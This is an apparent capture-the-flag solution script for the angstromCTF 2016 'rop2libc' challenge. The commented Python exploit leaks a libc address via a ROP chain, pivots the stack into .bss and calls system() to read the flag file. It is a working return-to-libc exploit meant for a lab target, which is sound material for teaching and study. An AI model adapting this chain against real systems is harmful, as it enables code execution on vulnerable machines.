angstromCTF 2016 - [binary 160] rop2libc
import struct
from subprocess import *
def p64(x):
    """Return ``x`` packed as one little-endian unsigned 64-bit qword.

    Every ROP-chain slot (gadget address or argument) goes through this so it
    lands on the x86-64 stack in the byte order the CPU pops it.  Raises
    ``struct.error`` if ``x`` is negative or does not fit in 64 bits.
    """
    qword = struct.pack('<Q', x)
    return qword
def u64(x):
    """Inverse of ``p64``: decode exactly 8 little-endian bytes to an int.

    Raises ``struct.error`` unless ``len(x) == 8`` -- a short leak (printf's
    ``%s`` stops at the first NUL byte) must be NUL-padded by the caller first.
    """
    (value,) = struct.unpack('<Q', x)
    return value
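def read_until(f, s):
    """Read from ``f`` one byte at a time until the data read ends with ``s``.

    Reading byte-wise is deliberate: ``f`` is a pipe to the target process and
    over-read data cannot be pushed back, so the delimiter has to be matched
    incrementally.  The accumulator takes its type from ``s`` (``str`` or
    ``bytes``) so the helper works on text and binary streams alike.

    Returns everything read, delimiter included.  Raises ``EOFError`` if the
    stream closes before ``s`` is seen (typically the target crashed or
    rejected the payload); the previous version spun forever here, because an
    empty ``read(1)`` at EOF never extends the buffer.
    """
    res = s[:0]
    while not res.endswith(s):
        chunk = f.read(1)
        if not chunk:
            raise EOFError('stream closed before %r was seen; got %r so far' % (s, res))
        res += chunk
    return res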
# Gadget and symbol addresses inside the rop2libc binary (fixed addresses, so
# the binary is presumably non-PIE).  The names state which instruction
# sequence each gadget is assumed to be; nothing in this script verifies
# that, so re-check them (objdump / ROPgadget) before reusing on another build.
addr_pop_rdi = 0x400633
addr_pop_rsi_r15 = 0x400631
# The two gadgets above are 2 bytes apart, consistent with the usual
# __libc_csu_init tail ("pop rsi; pop r15; ret" overlapping "pop rdi; ret").
addr_pop_rbp = 0x4004d5
addr_leave = 0x4005a7  # presumably "leave; ret" -- paired with pop rbp to pivot rsp
addr_printf = 0x400450  # presumably PLT stubs: callable before libc's base is known
addr_gets = 0x400480
addr_bss = 0x601048  # writable scratch: gets() stores the command line and fake stack here
addr_got_gets = 0x601030  # GOT slot holding libc's resolved gets() -- the info-leak target
addr_str = 0x400654 # "... %s" -- a format string containing %s, reused to print the GOT slot as a string
# libc offsets: valid only for the target's exact libc build.  With the wrong
# libc these silently produce a bogus base; the cheap sanity test is that the
# computed base must be page-aligned.
offset_libc_gets = 0x6f440
offset_libc_system = 0x46640
offset_libc_exit = 0x3c290
# Launch the vulnerable binary with all three standard streams piped.  NOTE:
# stderr is piped but never read; should the target emit a lot on stderr the
# full pipe would block it.  Acceptable only on the assumption that this
# target is quiet on stderr (not verified here).
p = Popen(['/problems/rop2libc/rop2libc'], stdin=PIPE, stdout=PIPE, stderr=PIPE)
# Stage 1 ROP chain.  72 bytes of filler reach the saved return address; each
# entry in the list below is one 8-byte stack slot, in the exact order the
# CPU pops them.
payload = 'A' * 72 + ''.join(p64(slot) for slot in [
    # --- leak: printf(addr_str, addr_got_gets) prints libc's gets() address
    addr_pop_rdi, addr_str,
    addr_pop_rsi_r15, addr_got_gets, 0x4242424242424242,  # r15 gets junk
    addr_printf,
    # --- flush: gets(bss) reads the 0x800-byte command line, then printing
    # it twice pushes 0x1000 bytes through stdout -- presumably to force the
    # full-buffered (pipe) stdio buffer, leak included, out to our side
    addr_pop_rdi, addr_bss, addr_gets,
    addr_pop_rdi, addr_bss, addr_printf,
    addr_pop_rdi, addr_bss, addr_printf,
    # --- pivot: gets(bss+0x802) reads the stage-2 fake stack (past the
    # 0x800-byte command and its NUL), then pop rbp / leave;ret moves rsp
    # there and returns into it
    addr_pop_rdi, addr_bss + 0x802, addr_gets,
    addr_pop_rbp, addr_bss + 0x802,
    addr_leave,
])
# Stage 1 data: the shell command system() will run, right-padded with 'A'
# to exactly 0x800 bytes so the chain's gets(bss) consumes one full line and
# printing it twice emits 0x1000 bytes.  The trailing "&& AAAA..." is a
# deliberately bogus second command -- cat has already run by the time the
# shell fails on it.  Must not contain '\n' (gets() would stop early); the
# 'A' filler never does.
padding = 'cat /problems/rop2libc/flag.txt && '.ljust(0x800, 'A')
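# Deliver stage 1: the overflowing line (ROP chain), then the command line
# that the chain's first gets() call reads into bss.  The flush is a no-op on
# Python 2's unbuffered Popen pipes but required under Python 3's buffered
# default, so it is cheap insurance either way.
p.stdin.write(payload + '\n')
p.stdin.write(padding + '\n')
p.stdin.flush()
# Skip output up to the second 'said: ' marker (assumed to be printed by the
# target around the leak); the bytes that follow, up to the newline, are the
# raw little-endian gets() address emitted by the leak printf.  A leaked
# address that itself contains 0x0a would be truncated here -- the sanity
# checks below are what catches that.
read_until(p.stdout, 'said: ')
read_until(p.stdout, 'said: ')
t = read_until(p.stdout, '\n')[:-1]
if not 0 < len(t) <= 8:
    raise ValueError('unexpected leak %r (expected 1..8 address bytes)' % (t,))
# %s stops at the first NUL, so a canonical user-space address arrives as 6
# bytes; pad it back to a full qword before unpacking.
libc_base = u64(t.ljust(8, '\0')) - offset_libc_gets
# libc is mapped on a page boundary, so a base that is not page-aligned means
# the leak or the hard-coded libc offsets do not match this target.  Stop
# here rather than returning into garbage addresses.
if libc_base & 0xfff:
    raise ValueError('libc base 0x%x is not page-aligned: wrong libc offsets or bad leak' % libc_base)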
# Stage 2: the fake stack that the pivot's leave;ret lands on at bss+0x802.
# Slot 0 is consumed by leave's `pop rbp`, so the chain proper starts at
# bss+0x80a: system(bss) runs the stage-1 command line, then exit() so the
# target terminates cleanly.  NOTE: from the constants above, rsp on entry to
# system() is bss+0x822 = 0x60186a, which is not 16-byte aligned; the 2016
# target tolerated this, but newer glibc builds can SIGSEGV on a movaps inside
# system() -- insert a lone `ret` gadget before it if porting this.
stack = ''.join([
    'AAAAAAAA',                                 # popped into rbp by `leave`
    p64(addr_pop_rdi), p64(addr_bss),           # rdi = "cat ... && AAAA..."
    p64(libc_base + offset_libc_system),
    p64(libc_base + offset_libc_exit),
])
p.stdin.write(stack + '\n')
# Everything the target prints from here until it exits -- i.e. the flag.
print(p.stdout.read())